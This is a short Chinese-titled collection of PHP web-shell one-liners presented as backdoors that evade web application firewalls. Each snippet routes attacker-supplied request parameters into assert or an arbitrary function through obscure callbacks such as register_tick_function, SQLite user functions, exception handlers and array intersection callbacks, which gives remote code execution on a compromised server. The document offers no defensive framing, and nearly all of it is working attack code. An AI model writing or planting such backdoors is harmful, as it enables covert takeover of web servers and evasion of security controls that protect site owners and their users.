PHP后门之冷门回调函数(过waf)

header_register_callback(create_function('','return assert($_POST[\'k\']);'));

$e = $_REQUEST['e'];
declare(ticks=1);
register_tick_function ($e, $_REQUEST['pass']);`

$e = $_REQUEST['e'];
$db = new PDO('sqlite:sqlite.db3');
$db->sqliteCreateFunction('myfunc', $e, 1);
$sth = $db->prepare("SELECT myfunc(:exec)");
$sth->execute(array(':exec' => $_REQUEST['pass']));
$e = $_REQUEST['e'];

register_shutdown_function($e, $_REQUEST['pass']);

mb_ereg_replace_callback('.+', create_function('$arr', 'return assert($arr[0]);'),$_REQUEST['pass']);

array_reduce(array($_POST['k']),create_function('$a,$b','return assert($b);'));

set_exception_handler(create_function('','return assert($_GET[k]);'));
throw new exception();

class a
{
  public function __construct($args)
  {
    forward_static_call('assert',$args);
  }
}
new a($_POST[k]);

iterator_apply(new arrayiterator(array($_GET['k'])),create_function('Iterator $i','assert($i->current());'),array(new arrayiterator(array($_GET['k']))));

array_intersect_ukey(array($_GET['k']=>'1'),array($_GET['k']=>'1'),'assert');

array_uintersect_uassoc(array($_GET[k]),array(''),'assert','strstr');

array_intersect_uassoc(array($_POST['k']=>''),array(''),'assert');

filter_var("phpinfo();" ,1024, array("options" => "assert"));